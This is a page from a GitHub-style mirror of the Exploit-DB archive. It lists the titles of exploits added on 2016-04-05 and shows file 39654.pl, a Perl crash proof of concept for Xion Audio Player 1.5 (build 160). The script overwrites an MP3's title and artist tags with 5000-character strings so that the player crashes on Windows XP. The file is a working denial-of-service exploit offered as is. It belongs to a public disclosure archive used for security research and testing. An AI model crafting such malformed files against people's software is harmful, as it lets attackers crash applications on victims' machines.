bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/39654.pl
Offensive Security 13d072b592 DB: 2016-04-05 
4 new exploits

Outlook ATTACH_BY_REF_ONLY File Execution
Outlook - ATTACH_BY_REF_ONLY File Execution

HB Ecommerce SQL Injection Vulnerability
HB Ecommerce - SQL Injection Vulnerability

SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability
SCO Open Server <= 5.0.4 - POP Server Buffer Overflow Vulnerability

Debian Linux <= 2.1 Print Queue Control Vulnerability
Debian Linux <= 2.1 - Print Queue Control Vulnerability

FreeBSD 3.3 gdc Buffer Overflow Vulnerability
FreeBSD 3.3 gdc - Buffer Overflow Vulnerability

Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability
Netscape FastTrack Server 2.0.1a - GET Buffer Overflow Vulnerability

NullSoft Winamp 2.10 Playlist Vulnerability
NullSoft Winamp 2.10 - Playlist Vulnerability

S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (2)
S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount - Buffer Overflow (2)

Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability
Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent Vulnerability

NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability
NetcPlus SmartServer3 3.75 - Weak Encryption Vulnerability

NetcPlus BrowseGate 2.80.2 Weak Encryption Vulnerability
NetcPlus BrowseGate 2.80.2 - Weak Encryption Vulnerability

My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability
My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure Vulnerability

Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference
Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference

Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability
Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Vulnerability

Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability
Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability

IDA Pro 6.3 Crash PoC
IDA Pro 6.3 - Crash PoC

Confixx 2 Perl Debugger Remote Command Execution Vulnerability
Confixx 2 - Perl Debugger Remote Command Execution Vulnerability

Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability
Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation Vulnerability

Novell NetMail 3.x Automatic Script Execution Vulnerability
Novell NetMail 3.x - Automatic Script Execution Vulnerability

Juniper Netscreen 5.0 VPN Username Enumeration Vulnerability
Juniper Netscreen 5.0 - VPN Username Enumeration Vulnerability

Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability
Microsoft Internet Explorer 7.0 - MHTML Denial of Service Vulnerability

WordPress Freshmail Unauthenticated SQL Injection
WordPress Freshmail - Unauthenticated SQL Injection

WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS
WordPress Download Manager Free 2.7.94 & Pro 4 - Authenticated Stored XSS

Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass

ADH-Web Server IP-Cameras - Multiple Vulnerabilities
Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC
Hexchat IRC Client 2.11.0 - Directory Traversal
Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow
PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities
2016-04-05 05:03:46 +00:00

23 lines
No EOL
777 B
Perl
Executable file
Raw Blame History

# Exploit Title: Xion Audio Player <= 1.5 (build 160) - Crash PoC
# Date: 01-04-2016
# Software Link: http://www.r2.com.au/downloads/files/xion-audio-player-v1.5b160.zip
# Homepage: http://www.xionplayer.com/
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Category: Crash PoC
# Tested on: Windows XP SP3 English
# Details: Overflowing title/artist tags on an *.mp3 seems to crash the software.
# (works on both standalone/portable versions)
use MP3::Tag;
$mp3 = MP3::Tag->new('legit.mp3'); # whatever mp3 you got handy
$mp3->title_set('A' x 5000); # title/artist tags
$mp3->artist_set('A' x 5000); # may vary although both seems to be needed
$mp3->update_tags();
$mp3->close();
print "[*] Completed.\n";
Reference in a new issue View git blame Copy permalink